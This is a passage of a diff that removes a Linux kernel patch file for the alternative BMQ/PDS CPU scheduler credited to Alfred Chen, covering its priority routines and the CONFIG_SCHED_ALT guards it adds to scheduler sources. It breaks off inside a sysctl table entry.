-+	return rq->curr == p;
-+}
-+
-+static inline bool task_on_cpu(struct task_struct *p)
-+{
-+	return p->on_cpu;
-+}
-+
-+extern int task_running_nice(struct task_struct *p);
-+
-+extern struct static_key_false sched_schedstats;
-+
-+#ifdef CONFIG_CPU_IDLE
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+	rq->idle_state = idle_state;
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	WARN_ON(!rcu_read_lock_held());
-+	return rq->idle_state;
-+}
-+#else
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	return NULL;
-+}
-+#endif
-+
-+static inline int cpu_of(const struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	return rq->cpu;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+#include "stats.h"
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#define NOHZ_BALANCE_KICK_BIT	0
-+#define NOHZ_STATS_KICK_BIT	1
-+
-+#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
-+#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
-+
-+#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
-+
-+#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
-+
-+/* TODO: needed?
-+extern void nohz_balance_exit_idle(struct rq *rq);
-+#else
-+static inline void nohz_balance_exit_idle(struct rq *rq) { }
-+*/
-+#endif
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+struct irqtime {
-+	u64			total;
-+	u64			tick_delta;
-+	u64			irq_start_time;
-+	struct u64_stats_sync	sync;
-+};
-+
-+DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
-+
-+/*
-+ * Returns the irqtime minus the softirq time computed by ksoftirqd.
-+ * Otherwise ksoftirqd's sum_exec_runtime is substracted its own runtime
-+ * and never move forward.
-+ */
-+static inline u64 irq_time_read(int cpu)
-+{
-+	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
-+	unsigned int seq;
-+	u64 total;
-+
-+	do {
-+		seq = __u64_stats_fetch_begin(&irqtime->sync);
-+		total = irqtime->total;
-+	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
-+
-+	return total;
-+}
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+
-+#ifdef CONFIG_CPU_FREQ
-+DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+extern int __init sched_tick_offload_init(void);
-+#else
-+static inline int sched_tick_offload_init(void) { return 0; }
-+#endif
-+
-+#ifdef arch_scale_freq_capacity
-+#ifndef arch_scale_freq_invariant
-+#define arch_scale_freq_invariant()	(true)
-+#endif
-+#else /* arch_scale_freq_capacity */
-+#define arch_scale_freq_invariant()	(false)
-+#endif
-+
-+extern void schedule_idle(void);
-+
-+#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
-+
-+/*
-+ * !! For sched_setattr_nocheck() (kernel) only !!
-+ *
-+ * This is actually gross. :(
-+ *
-+ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
-+ * tasks, but still be able to sleep. We need this on platforms that cannot
-+ * atomically change clock frequency. Remove once fast switching will be
-+ * available on such platforms.
-+ *
-+ * SUGOV stands for SchedUtil GOVernor.
-+ */
-+#define SCHED_FLAG_SUGOV	0x10000000
-+
-+#ifdef CONFIG_MEMBARRIER
-+/*
-+ * The scheduler provides memory barriers required by membarrier between:
-+ * - prior user-space memory accesses and store to rq->membarrier_state,
-+ * - store to rq->membarrier_state and following user-space memory accesses.
-+ * In the same way it provides those guarantees around store to rq->curr.
-+ */
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+	int membarrier_state;
-+
-+	if (prev_mm == next_mm)
-+		return;
-+
-+	membarrier_state = atomic_read(&next_mm->membarrier_state);
-+	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
-+		return;
-+
-+	WRITE_ONCE(rq->membarrier_state, membarrier_state);
-+}
-+#else
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+}
-+#endif
-+
-+#ifdef CONFIG_NUMA
-+extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
-+#else
-+static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return nr_cpu_ids;
-+}
-+#endif
-+
-+extern void swake_up_all_locked(struct swait_queue_head *q);
-+extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+extern int preempt_dynamic_mode;
-+extern int sched_dynamic_mode(const char *str);
-+extern void sched_dynamic_update(int mode);
-+#endif
-+
-+static inline void nohz_run_idle_balance(int cpu) { }
-+
-+static inline
-+unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
-+				  struct task_struct *p)
-+{
-+	return util;
-+}
-+
-+static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
-+
-+#endif /* ALT_SCHED_H */
-diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
-new file mode 100644
-index 000000000000..66b77291b9d0
---- /dev/null
-+++ b/kernel/sched/bmq.h
-@@ -0,0 +1,110 @@
-+#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+/*
-+ * BMQ only routines
-+ */
-+#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
-+#define boost_threshold(p)	(sched_timeslice_ns >>\
-+				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
-+
-+static inline void boost_task(struct task_struct *p)
-+{
-+	int limit;
-+
-+	switch (p->policy) {
-+	case SCHED_NORMAL:
-+		limit = -MAX_PRIORITY_ADJ;
-+		break;
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		limit = 0;
-+		break;
-+	default:
-+		return;
-+	}
-+
-+	if (p->boost_prio > limit)
-+		p->boost_prio--;
-+}
-+
-+static inline void deboost_task(struct task_struct *p)
-+{
-+	if (p->boost_prio < MAX_PRIORITY_ADJ)
-+		p->boost_prio++;
-+}
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms) {}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	return p->prio + p->boost_prio - MAX_RT_PRIO;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO)? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return task_sched_prio(p);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return prio;
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return idx;
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
-+		if (SCHED_RR != p->policy)
-+			deboost_task(p);
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+	}
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
-+
-+inline int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p)
-+{
-+	if(this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
-+		boost_task(p);
-+}
-+#endif
-+
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
-+{
-+	if (rq_switch_time(rq) < boost_threshold(p))
-+		boost_task(p);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq) {}
-diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
-index d9dc9ab3773f..71a25540d65e 100644
---- a/kernel/sched/build_policy.c
-+++ b/kernel/sched/build_policy.c
-@@ -42,13 +42,19 @@
- 
- #include "idle.c"
- 
-+#ifndef CONFIG_SCHED_ALT
- #include "rt.c"
-+#endif
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- # include "cpudeadline.c"
-+#endif
- # include "pelt.c"
- #endif
- 
- #include "cputime.c"
--#include "deadline.c"
- 
-+#ifndef CONFIG_SCHED_ALT
-+#include "deadline.c"
-+#endif
-diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
-index 99bdd96f454f..23f80a86d2d7 100644
---- a/kernel/sched/build_utility.c
-+++ b/kernel/sched/build_utility.c
-@@ -85,7 +85,9 @@
- 
- #ifdef CONFIG_SMP
- # include "cpupri.c"
-+#ifndef CONFIG_SCHED_ALT
- # include "stop_task.c"
-+#endif
- # include "topology.c"
- #endif
- 
-diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
-index 1207c78f85c1..68812e0756cb 100644
---- a/kernel/sched/cpufreq_schedutil.c
-+++ b/kernel/sched/cpufreq_schedutil.c
-@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
- 	struct rq *rq = cpu_rq(sg_cpu->cpu);
- 
- 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
-+#ifndef CONFIG_SCHED_ALT
- 	sg_cpu->bw_dl = cpu_bw_dl(rq);
- 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
- 					  FREQUENCY_UTIL, NULL);
-+#else
-+	sg_cpu->bw_dl = 0;
-+	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
-+#endif /* CONFIG_SCHED_ALT */
- }
- 
- /**
-@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
-  */
- static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
- 		sg_cpu->sg_policy->limits_changed = true;
-+#endif
- }
- 
- static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
-@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
- 	}
- 
- 	ret = sched_setattr_nocheck(thread, &attr);
-+
- 	if (ret) {
- 		kthread_stop(thread);
- 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
-@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
- #ifdef CONFIG_ENERGY_MODEL
- static void rebuild_sd_workfn(struct work_struct *work)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	rebuild_sched_domains_energy();
-+#endif /* CONFIG_SCHED_ALT */
- }
- static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
- 
-diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
-index 95fc77853743..b48b3f9ed47f 100644
---- a/kernel/sched/cputime.c
-+++ b/kernel/sched/cputime.c
-@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
- 	p->utime += cputime;
- 	account_group_user_time(p, cputime);
- 
--	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
-+	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
- 
- 	/* Add user time to cpustat. */
- 	task_group_account_field(p, index, cputime);
-@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
- 	p->gtime += cputime;
- 
- 	/* Add guest time to cpustat. */
--	if (task_nice(p) > 0) {
-+	if (task_running_nice(p)) {
- 		task_group_account_field(p, CPUTIME_NICE, cputime);
- 		cpustat[CPUTIME_GUEST_NICE] += cputime;
- 	} else {
-@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
- #ifdef CONFIG_64BIT
- static inline u64 read_sum_exec_runtime(struct task_struct *t)
- {
--	return t->se.sum_exec_runtime;
-+	return tsk_seruntime(t);
- }
- #else
- static u64 read_sum_exec_runtime(struct task_struct *t)
-@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
- 	struct rq *rq;
- 
- 	rq = task_rq_lock(t, &rf);
--	ns = t->se.sum_exec_runtime;
-+	ns = tsk_seruntime(t);
- 	task_rq_unlock(rq, t, &rf);
- 
- 	return ns;
-@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
- void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
- {
- 	struct task_cputime cputime = {
--		.sum_exec_runtime = p->se.sum_exec_runtime,
-+		.sum_exec_runtime = tsk_seruntime(p),
- 	};
- 
- 	if (task_cputime(p, &cputime.utime, &cputime.stime))
-diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
-index 1637b65ba07a..033c6deeb515 100644
---- a/kernel/sched/debug.c
-+++ b/kernel/sched/debug.c
-@@ -7,6 +7,7 @@
-  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * This allows printing both to /proc/sched_debug and
-  * to the console
-@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
- };
- 
- #endif /* SMP */
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 
-@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
- 
- #endif /* CONFIG_PREEMPT_DYNAMIC */
- 
-+#ifndef CONFIG_SCHED_ALT
- __read_mostly bool sched_debug_verbose;
- 
- static const struct seq_operations sched_debug_sops;
-@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
- 	.llseek		= seq_lseek,
- 	.release	= seq_release,
- };
-+#endif /* !CONFIG_SCHED_ALT */
- 
- static struct dentry *debugfs_sched;
- 
-@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
- 
- 	debugfs_sched = debugfs_create_dir("sched", NULL);
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
- 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
-+#endif /* !CONFIG_SCHED_ALT */
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
- #endif
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
- 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
- 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
-@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
- #endif
- 
- 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
-+#endif /* !CONFIG_SCHED_ALT */
- 
- 	return 0;
- }
- late_initcall(sched_init_debug);
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_SMP
- 
- static cpumask_var_t		sd_sysctl_cpus;
-@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
- 	memset(&p->stats, 0, sizeof(p->stats));
- #endif
- }
-+#endif /* !CONFIG_SCHED_ALT */
- 
- void resched_latency_warn(int cpu, u64 latency)
- {
-diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
-index f26ab2675f7d..480d4ad16d45 100644
---- a/kernel/sched/idle.c
-+++ b/kernel/sched/idle.c
-@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
- 		do_idle();
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * idle-task scheduling class.
-  */
-@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
- 	.switched_to		= switched_to_idle,
- 	.update_curr		= update_curr_idle,
- };
-+#endif
-diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
-new file mode 100644
-index 000000000000..56a649d02e49
---- /dev/null
-+++ b/kernel/sched/pds.h
-@@ -0,0 +1,127 @@
-+#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+static int sched_timeslice_shift = 22;
-+
-+#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms)
-+{
-+	if (2 == timeslice_ms)
-+		sched_timeslice_shift = 21;
-+}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
-+
-+	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
-+		      "pds: task_sched_prio_normal() delta %lld\n", delta))
-+		return NORMAL_PRIO_NUM - 1;
-+
-+	return (delta < 0) ? 0 : delta;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio :
-+		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
-+		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
-+						  rq->time_edge);
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
-+				NORMAL_PRIO_MOD(rq->time_edge));
-+}
-+
-+static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
-+{
-+	if (p->prio >= MAX_RT_PRIO)
-+		p->deadline = (rq->clock >> sched_timeslice_shift) +
-+			p->static_prio - (MAX_PRIO - NICE_WIDTH);
-+}
-+
-+int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio > DEFAULT_PRIO);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq)
-+{
-+	struct list_head head;
-+	u64 old = rq->time_edge;
-+	u64 now = rq->clock >> sched_timeslice_shift;
-+	u64 prio, delta;
-+
-+	if (now == old)
-+		return;
-+
-+	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
-+	INIT_LIST_HEAD(&head);
-+
-+	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
-+		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
-+				      NORMAL_PRIO_MOD(prio + old), &head);
-+
-+	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
-+		rq->queue.bitmap[2] >> delta;
-+	rq->time_edge = now;
-+	if (!list_empty(&head)) {
-+		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
-+		struct task_struct *p;
-+
-+		list_for_each_entry(p, &head, sq_node)
-+			p->sq_idx = idx;
-+
-+		list_splice(&head, rq->queue.heads + idx);
-+		rq->queue.bitmap[2] |= 1UL;
-+	}
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+	sched_renew_deadline(p, rq);
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
-+{
-+	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
-+	if (unlikely(p->deadline > max_dl))
-+		p->deadline = max_dl;
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	sched_renew_deadline(p, rq);
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	time_slice_expired(p, rq);
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p) {}
-+#endif
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
-diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
-index 0f310768260c..bd38bf738fe9 100644
---- a/kernel/sched/pelt.c
-+++ b/kernel/sched/pelt.c
-@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
- 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * sched_entity:
-  *
-@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- 
- 	return 0;
- }
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- /*
-  * thermal:
-  *
-diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
-index 3a0e0dc28721..e8a7d84aa5a5 100644
---- a/kernel/sched/pelt.h
-+++ b/kernel/sched/pelt.h
-@@ -1,13 +1,15 @@
- #ifdef CONFIG_SMP
- #include "sched-pelt.h"
- 
-+#ifndef CONFIG_SCHED_ALT
- int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
- int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
- int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
- int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
- int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
- 
- static inline u64 thermal_load_avg(struct rq *rq)
-@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
- 	return PELT_MIN_DIVIDER + avg->period_contrib;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void cfs_se_util_change(struct sched_avg *avg)
- {
- 	unsigned int enqueued;
-@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
- 	return rq_clock_pelt(rq_of(cfs_rq));
- }
- #endif
-+#endif /* CONFIG_SCHED_ALT */
- 
- #else
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline int
- update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
- {
-@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- {
- 	return 0;
- }
-+#endif
- 
- static inline int
- update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
-diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
-index a4a20046e586..c363693cd869 100644
---- a/kernel/sched/sched.h
-+++ b/kernel/sched/sched.h
-@@ -5,6 +5,10 @@
- #ifndef _KERNEL_SCHED_SCHED_H
- #define _KERNEL_SCHED_SCHED_H
- 
-+#ifdef CONFIG_SCHED_ALT
-+#include "alt_sched.h"
-+#else
-+
- #include <linux/sched/affinity.h>
- #include <linux/sched/autogroup.h>
- #include <linux/sched/cpufreq.h>
-@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
- 	cgroup_account_cputime(curr, delta_exec);
- }
- 
-+static inline int task_running_nice(struct task_struct *p)
-+{
-+	return (task_nice(p) > 0);
-+}
-+#endif /* !CONFIG_SCHED_ALT */
- #endif /* _KERNEL_SCHED_SCHED_H */
-diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
-index 857f837f52cb..5486c63e4790 100644
---- a/kernel/sched/stats.c
-+++ b/kernel/sched/stats.c
-@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 	} else {
- 		struct rq *rq;
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		struct sched_domain *sd;
- 		int dcount = 0;
-+#endif
- #endif
- 		cpu = (unsigned long)(v - 2);
- 		rq = cpu_rq(cpu);
-@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 		seq_printf(seq, "\n");
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		/* domain-specific stats */
- 		rcu_read_lock();
- 		for_each_domain(cpu, sd) {
-@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 			    sd->ttwu_move_balance);
- 		}
- 		rcu_read_unlock();
-+#endif
- #endif
- 	}
- 	return 0;
-diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
-index 84a188913cc9..53934e7ef5db 100644
---- a/kernel/sched/stats.h
-+++ b/kernel/sched/stats.h
-@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
- 
- #endif /* CONFIG_SCHEDSTATS */
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_FAIR_GROUP_SCHED
- struct sched_entity_stats {
- 	struct sched_entity     se;
-@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
- #endif
- 	return &task_of(se)->stats;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PSI
- void psi_task_change(struct task_struct *task, int clear, int set);
-diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
-index 8739c2a5a54e..d8dd6c15eb47 100644
---- a/kernel/sched/topology.c
-+++ b/kernel/sched/topology.c
-@@ -3,6 +3,7 @@
-  * Scheduler topology setup/handling methods
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- DEFINE_MUTEX(sched_domains_mutex);
- 
- /* Protected by sched_domains_mutex: */
-@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
-  */
- 
- static int default_relax_domain_level = -1;
-+#endif /* CONFIG_SCHED_ALT */
- int sched_domain_level_max;
- 
-+#ifndef CONFIG_SCHED_ALT
- static int __init setup_relax_domain_level(char *str)
- {
- 	if (kstrtoint(str, 0, &default_relax_domain_level))
-@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
- 
- 	return sd;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- /*
-  * Topology list, bottom-up.
-@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
- 	sched_domain_topology_saved = NULL;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA
- 
- static const struct cpumask *sd_numa_mask(int cpu)
-@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
- 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
- 	mutex_unlock(&sched_domains_mutex);
- }
-+#else /* CONFIG_SCHED_ALT */
-+void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
-+			     struct sched_domain_attr *dattr_new)
-+{}
-+
-+#ifdef CONFIG_NUMA
-+int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return best_mask_cpu(cpu, cpus);
-+}
-+#endif /* CONFIG_NUMA */
-+#endif
-diff --git a/kernel/sysctl.c b/kernel/sysctl.c
-index c6d9dec11b74..2bc42ce8b48e 100644
---- a/kernel/sysctl.c
-+++ b/kernel/sysctl.c
-@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
- 
- /* Constants used for minimum and maximum */
- 
-+#ifdef CONFIG_SCHED_ALT
-+extern int sched_yield_type;
-+#endif
-+
- #ifdef CONFIG_PERF_EVENTS
- static const int six_hundred_forty_kb = 640 * 1024;
- #endif
-@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
- }
- 
- static struct ctl_table kern_table[] = {
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA_BALANCING
- 	{
- 		.procname	= "numa_balancing",
-@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
- 		.extra1		= SYSCTL_ZERO,
- 	},
- #endif /* CONFIG_NUMA_BALANCING */
-+#endif /* !CONFIG_SCHED_ALT */
- 	{
- 		.procname	= "panic",
- 		.data		= &panic_timeout,
-@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
- 		.proc_handler	= proc_dointvec,
- 	},
- #endif
-+#ifdef CONFIG_SCHED_ALT
-+	{
